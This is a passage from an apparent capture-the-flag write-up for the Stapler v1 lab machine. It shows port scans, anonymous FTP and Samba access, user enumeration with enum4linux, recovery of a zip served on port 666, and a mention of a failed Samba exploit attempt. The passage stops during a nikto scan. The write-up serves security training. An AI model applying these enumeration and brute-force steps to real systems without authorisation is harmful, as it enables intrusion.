**********
Stapler v1
**********
VM URL: ``_.
IP address of Stapler Virtual Machine: 10.0.133.27
The following writeup takes a methodical approach, looking at each discovered service in turn and considering their part (if any) in exploiting the system. The guide is quite verbose so you may find it best to skip to the sections that are of interest to you.
In total 3 paths to a low privilege shell and 2 ways to escalate privilages to root were discovered as well as some easter eggs along the way.
Initial port scans
==================
unicornscan or all TCP ports
----------------------------
.. raw:: html
root@kali:~/vulnhub/stapler# unicornscan 10.0.133.27:a -I
TCP open ftp[ 21] from 10.0.133.27 ttl 64
TCP open ssh[ 22] from 10.0.133.27 ttl 64
TCP open domain[ 53] from 10.0.133.27 ttl 64
TCP open http[ 80] from 10.0.133.27 ttl 64
TCP open netbios-ssn[ 139] from 10.0.133.27 ttl 64
TCP open mdqs[ 666] from 10.0.133.27 ttl 64
TCP open mysql[ 3306] from 10.0.133.27 ttl 64
TCP open unknown[12380] from 10.0.133.27 ttl 64
unicornscan or all UDP ports
----------------------------
.. raw:: html
root@kali:~/vulnhub/stapler# unicornscan 10.0.133.27:a -mU
UDP open domain[ 53] from 10.0.133.27 ttl 64
UDP open netbios-ns[ 137] from 10.0.133.27 ttl 64
UDP open unknown[58470] from 10.0.133.27 ttl 64
Further investigation into exposed services
===========================================
FTP service on port 21
----------------------
nmap -A scan of port 21 (-A enables: OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute):
.. raw:: html
root@kali:~/vulnhub/stapler# nmap -A -p 21 10.0.133.27
Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-29 15:37 BST
Nmap scan report for 10.0.133.27
Host is up (0.00027s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "Permission denied."
MAC Address: 00:1A:4A:16:01:0A (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8, Linux 4.4
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.27 ms 10.0.133.27
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.60 seconds
The FTP server allows anonymous access without a password.
Connect to FTP server and attempt anonymous login:
.. raw:: html
root@kali:~/vulnhub/stapler# ftp 10.0.133.27
Connected to 10.0.133.27.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (10.0.133.27:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
A potential user account, "harry" is enumerated in the FTP servers banner. Shame Harry didnt update the banner for us!
list the directories on the FTP server:
.. raw:: html
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jun 04 2016 .
drwxr-xr-x 2 0 0 4096 Jun 04 2016 ..
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
Download note file:
.. raw:: html
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (985.7753 kB/s)
Contents of note:
.. raw:: html
root@kali:~/vulnhub/stapler# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
File upload, at least for anonymous users, is not allowed:
.. raw:: html
ftp> put test
local: test remote: test
200 PORT command successful. Consider using PASV.
550 Permission denied.
Two more possible user accounts "elly" (who appears to have an FTP account) and "john" are learned.
vsftpd version 2.0.8 does not appear to have any known vulnerabilities.
Attempting to brute force the FTP passwords on the discovered accounts may be worthwhile.
HTTP service on port 80
-----------------------
namp scan:
.. raw:: html
root@kali:~/vulnhub/stapler# nmap -A 10.0.133.27 -p80
Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-29 15:55 BST
Nmap scan report for 10.0.133.27
Host is up (0.00029s latency).
PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
MAC Address: 00:1A:4A:16:01:0A (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8, Linux 4.4
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms 10.0.133.27
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.25 seconds
nikto scan:
.. raw:: html
root@kali:~/vulnhub/stapler# nikto -h 10.0.133.27:80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.133.27
+ Target Hostname: 10.0.133.27
+ Target Port: 80
+ Start Time: 2018-03-29 16:06:04 (GMT1)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and systemconfiguration.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2018-03-29 16:06:13 (GMT1) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The web server appears to be an instance of PHP's built in web server. Nikto scan found .bashrc and .profile files so it appears to have been started in and is serving the contents of a users home directory.
Manual inspection of `.bashrc` and `.profile` does not reveal any information that may be useful to compromise the host.
A .bash_history file, which could contain useful information such as passwords does not appear to be accessible/present.
NETBIOS-SSN service on port 139
-------------------------------
nmap:
.. raw:: html
root@kali:~/vulnhub/stapler# nmap -A -p 139 10.0.133.27
Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-29 16:10 BST
Nmap scan report for 10.0.133.27
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:1A:4A:16:01:0A (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8, Linux 4.4
Network Distance: 1 hop
Service Info: Host: RED
Host script results:
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2018-03-29T16:10:22+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms 10.0.133.27
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.39 seconds
Samba 4.3.11 appears to be vulnerable to "Samba is_known_pipename() Arbitrary Module Load" CVE-2017-7494
A quick test using metasploits "Samba is_known_pipename() Arbitrary Module Load" module fails to obtain a shell using this exploit.
enum4linux:
.. raw:: html
root@kali:~/vulnhub/stapler# enum4linux -a 10.0.133.27
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 22 07:05:21 2018
==========================
| Target Information |
==========================
Target ........... 10.0.133.27
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===================================================
| Enumerating Workgroup/Domain on 10.0.133.27 |
===================================================
[+] Got domain/workgroup name: WORKGROUP
===========================================
| Nbtstat Information for 10.0.133.27 |
===========================================
Looking up status of 10.0.133.27
RED <00> - H Workstation Service
RED <03> - H Messenger Service
RED <20> - H File Server Service
..__MSBROWSE__. <01> - H Master Browser
WORKGROUP <00> - H Domain/Workgroup Name
WORKGROUP <1d> - H Master Browser
WORKGROUP <1e> - H Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================
| Session Check on 10.0.133.27 |
====================================
[+] Server 10.0.133.27 allows sessions using username '', password ''
==========================================
| Getting domain SID for 10.0.133.27 |
==========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=====================================
| OS information on 10.0.133.27 |
=====================================
[+] Got OS info for 10.0.133.27 from smbclient: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
[+] Got OS info for 10.0.133.27 from srvinfo:
RED Wk Sv PrQ Unx NT SNT red server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
============================
| Users on 10.0.133.27 |
============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.
========================================
| Share Enumeration on 10.0.133.27 |
========================================
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Server Comment
--------- -------
RED red server (Samba, Ubuntu)
Workgroup Master
--------- -------
WORKGROUP RED
[+] Attempting to map shares on 10.0.133.27
//10.0.133.27/print$ Mapping: DENIED, Listing: N/A
//10.0.133.27/kathy Mapping: OK, Listing: OK//10.0.133.27/tmp Mapping: OK, Listing: OK
//10.0.133.27/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Connection to 10.0.133.27 failed (Error NT_STATUS_IO_TIMEOUT)
===================================================
| Password Policy Information for 10.0.133.27 |
===================================================
[+] Attaching to 10.0.133.27 using a NULL share
[+] Trying protocol 445/SMB...
[!] Protocol failed: [Errno Connection error (10.0.133.27:445)] [Errno 110] Connection timed out
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] RED
[+] Builtin
[+] Password Info for Domain: RED
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
=============================
| Groups on 10.0.133.27 |
=============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
======================================================================
| Users on 10.0.133.27 via RID cycling (RIDS: 500-550,1000-1050) |
======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-864226560-67800430-3082388513 and logon username '', password ''
S-1-5-21-864226560-67800430-3082388513-500 *unknown*\*unknown* (8)
S-1-5-21-864226560-67800430-3082388513-501 RED\nobody (Local User)
...
S-1-5-21-864226560-67800430-3082388513-513 RED\None (Domain Group)
...
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
...
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)S-1-22-1-1001 Unix User\RNunemaker (Local User)S-1-22-1-1002 Unix User\ETollefson (Local User)S-1-22-1-1003 Unix User\DSwanger (Local User)S-1-22-1-1004 Unix User\AParnell (Local User)S-1-22-1-1005 Unix User\SHayslett (Local User)S-1-22-1-1006 Unix User\MBassin (Local User)S-1-22-1-1007 Unix User\JBare (Local User)S-1-22-1-1008 Unix User\LSolum (Local User)S-1-22-1-1009 Unix User\IChadwick (Local User)S-1-22-1-1010 Unix User\MFrei (Local User)S-1-22-1-1011 Unix User\SStroud (Local User)S-1-22-1-1012 Unix User\CCeaser (Local User)S-1-22-1-1013 Unix User\JKanode (Local User)S-1-22-1-1014 Unix User\CJoo (Local User)S-1-22-1-1015 Unix User\Eeth (Local User)S-1-22-1-1016 Unix User\LSolum2 (Local User)S-1-22-1-1017 Unix User\JLipps (Local User)S-1-22-1-1018 Unix User\jamie (Local User)S-1-22-1-1019 Unix User\Sam (Local User)S-1-22-1-1020 Unix User\Drew (Local User)S-1-22-1-1021 Unix User\jess (Local User)S-1-22-1-1022 Unix User\SHAY (Local User)S-1-22-1-1023 Unix User\Taylor (Local User)S-1-22-1-1024 Unix User\mel (Local User)S-1-22-1-1025 Unix User\kai (Local User)S-1-22-1-1026 Unix User\zoe (Local User)S-1-22-1-1028 Unix User\www (Local User)S-1-22-1-1029 Unix User\elly (Local User)
============================================
| Getting printer info for 10.0.133.27 |
============================================
No printers returned.
enum4linux complete on Thu Mar 22 07:33:22 2018
The above output is redacted to remove redundant lines of enum4linux's output.
enum4linux enumerated a large number of local unix user accounts on the system.
The comment on Kathys share "Fred, What are we doing here?" implies a user "fred" may exist on the system but this user (or any in the format FLastname) does not appear to be present on the host.
Exploring the available SAMBA shares (Kathy and tmp)
kathy:
.. raw:: html
root@kali:~/vulnhub/stapler# smbclient '\\10.0.133.27\kathy' -U anonymous
WARNING: The "syslog" option is deprecated
Enter anonymous's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
. D 0 Fri Jun 3 17:52:52 2016
.. D 0 Mon Jun 6 22:39:56 2016
kathy_stuff D 0 Sun Jun 5 16:02:27 2016
backup D 0 Sun Jun 5 16:04:14 2016
19478204 blocks of size 1024. 16110076 blocks available
smb: \>
tmp:
.. raw:: html
root@kali:~/vulnhub/stapler# smbclient '\\10.0.133.27\tmp'
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
. D 0 Thu Mar 22 07:19:40 2018
.. D 0 Mon Jun 6 22:39:56 2016
ls N 274 Sun Jun 5 16:32:58 2016
19478204 blocks of size 1024. 16110072 blocks available
Download contents of kathy and tmp shares for further anlysis
.. raw:: html
root@kali:~/vulnhub/stapler# smbclient '\\10.0.133.27\tmp' -Tc tmp.tar
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tar:712 Total bytes received: 274
root@kali:~/vulnhub/stapler# smbclient '\\10.0.133.27\kathy' -Tc kathy.tar
WARNING: The "syslog" option is deprecated
Enter root's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
tar:712 Total bytes received: 6327792
File names "ls" in tmp:
.. raw:: html
root@kali:~/vulnhub/stapler# cat ls
.:
total 12.0K
drwxrwxrwt 2 root root 4.0K Jun 5 16:32 .
drwxr-xr-x 16 root root 4.0K Jun 3 22:06 ..
-rw-r--r-- 1 root root 0 Jun 5 16:32 ls
drwx------ 3 root root 4.0K Jun 5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ
Kathy's todo-list.txt:
.. raw:: html
root@kali:~/vulnhub/stapler/samba/kathy_stuff# cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy
Wordpress archive in Kathy's backups doesn't contain any user or database credentials.
vsftpd.conf file in backups appears to contain mostly default settings, the following lines are however interesting:
.. code-block:: text
# Uncomment this to allow local users to log in.
local_enable=YES
This setting means that any local unix user account will be able to login to the FTP server using their credentials.
.. code-block:: text
:emphasize-lines: 4,6
# You may restrict local users to their home directories. See the FAQ for
# the possible risks in this before using chroot_local_user or
# chroot_list_enable below.
chroot_local_user=YES
userlist_enable=YES
local_root=/etc
Upon successful login the user will be chrooted to /etc, this could prove useful in enumerating server configuration if a local user account can be cracked or compromised.
Unknown service on port 666
---------------------------
nmap scan:
.. raw:: html
root@kali:~/vulnhub/stapler# nmap -A -p 666 10.0.133.27
Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-29 17:28 BST
WARNING: RST from 10.0.133.27 port 666 -- is this port really open?
WARNING: RST from 10.0.133.27 port 666 -- is this port really open?
WARNING: RST from 10.0.133.27 port 666 -- is this port really open?
WARNING: RST from 10.0.133.27 port 666 -- is this port really open?
WARNING: RST from 10.0.133.27 port 666 -- is this port really open?
WARNING: RST from 10.0.133.27 port 666 -- is this port really open?
Nmap scan report for 10.0.133.27
Host is up (0.00030s latency).
PORT STATE SERVICE VERSION
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.50%I=7%D=3/29%Time=5ABD141E%P=x86_64-pc-linux-gnu%r(NUL
SF:L,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x1
SF:52\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x0
SF:4\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa
SF:2\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\
SF:x0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\x
SF:b2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu
SF:\xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd
SF:3\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa
SF:0\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x
SF:87\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\x
SF:f4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\x
SF:dc\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd
SF:5\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xa
SF:f\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:
SF:\xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\
SF:x8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\
SF:xe7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd
SF:\xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\
SF:x9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\
SF:xf1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\
SF:xf8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak
SF:\xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\
SF:xd2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f
SF:\xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\
SF:[\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\x
SF:cc\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa
SF:7\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\
SF:xfd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x9
SF:6\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f
SF:\xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4
SF:\xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\
SF:x88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xb
SF:cL}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0
SF:\.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\
SF:xf6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\x
SF:f3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\
SF:?\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
MAC Address: 00:1A:4A:16:01:0A (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.21
OS details: Linux 2.4.21
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.30 ms 10.0.133.27
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.36 seconds
nc to the service on port 666:
.. raw:: html
root@kali:~/vulnhub/stapler# nnc 10.0.133.27 666 | head
PK d Hp , 2
message2.jpgUT + QWJ QWux
...
The first two characters of text displayed, "PK", are interesting and suggest that the server is sending the binary contents of a Zip file upon connection.
"Most of the signatures end with the short integer 0x4b50, which is stored in little-endian ordering. Viewed as an ASCII string this reads "PK", the initials of the inventor Phil Katz. Thus, when a ZIP file is viewed in a text editor the first two bytes of the file are usually "PK"."
-- ``_
Save the output to file using curl:
.. raw:: html
root@kali:~/vulnhub/stapler# curl 10.0.133.27:666 -o 666.out
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11608 0 11608 0 0 2267k 0 --:--:-- --:--:-- --:--:-- 2267k
Open 666.out in Bless hex editor
.. image:: ./images/stapler/Stapler_666.out_hex.png
:alt: 666.out hex editor
Run "file" on 666.out to confirm:
.. raw:: html
root@kali:~/vulnhub/stapler# file 666.out
666.out: Zip archive data, at least v2.0 to extract
Rename 666.out to 666.zip, list and extract to examine the contents of the recovered ZIP file:
.. raw:: html
.. image:: ./images/stapler/Stapler_message2_666zip.png
:alt: message2.jpg
The image is of a screenshot of a shell session, it appears that there may be a user named "Scott" on the system.
What ever command he ran appeared to cause a segmentation fault so looking for buffer overflows in custom applications later discovered may prove fruitful.
Check for data in exif:
.. raw:: html
root@kali:~/vulnhub/stapler# exif message2.jpg
Corrupt data
The data provided does not follow the specification.
ExifLoader: The data supplied does not seem to contain EXIF data.
Run strings on message2.jpg to look for hidden content:
.. raw:: html
root@kali:~/vulnhub/stapler# strings -10 message2.jpg
vPhotoshop 3.0
1If you are reading this, you should get a cookie!
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
We get a cookie for our troubles but nothing useful for exploiting the VM.
MySQL service on port 3306
--------------------------
nmap scan:
.. raw:: html
root@kali:~/vulnhub/stapler# nmap -A -p3306 10.0.133.27
Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-22 09:01 GMT
Nmap scan report for 10.0.133.27
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 19
| Capabilities flags: 63487
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, FoundRows, LongPassword, InteractiveClient, SupportsCompression, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, IgnoreSigpipes, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: ^g)\x0CwYXG6D`\x07>\uy\x01\x15F\x14
|_ Auth Plugin Name: 88
MAC Address: 00:1A:4A:16:01:0A (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 10.0.133.27
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.31 seconds
The MySQL server does not appear to be susceptible to any known remote exploit but may contain useful data.
Remote access appears to be enabled to the MySQL cli though valid credentials are required:
.. raw:: html
root@kali:~/vulnhub/stapler# mysql -h 10.0.133.27 -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'10.0.133.6' (using password: YES)
If credentials for a database user could be obtained or brute forced then this may provide a vector to obtain a shell on the host.
HTTP server on port 12380
-------------------------
.. raw:: html
root@kali:~/vulnhub/stapler# nmap -A -p 12380 10.0.133.27
Starting Nmap 7.50 ( https://nmap.org ) at 2018-03-22 09:28 GMT
Nmap scan report for 10.0.133.27
Host is up (0.00027s latency).
PORT STATE SERVICE VERSION
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:1A:4A:16:01:0A (Qumranet)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8, Linux 3.16 - 4.6, Linux 3.2 - 4.8, Linux 4.4
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.27 ms 10.0.133.27
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.54 seconds
Apache webserver, run nikto scan
.. raw:: html
root@kali:~/vulnhub/stapler# nikto -h 10.0.133.27:12380
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.133.27
+ Target Hostname: 10.0.133.27
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
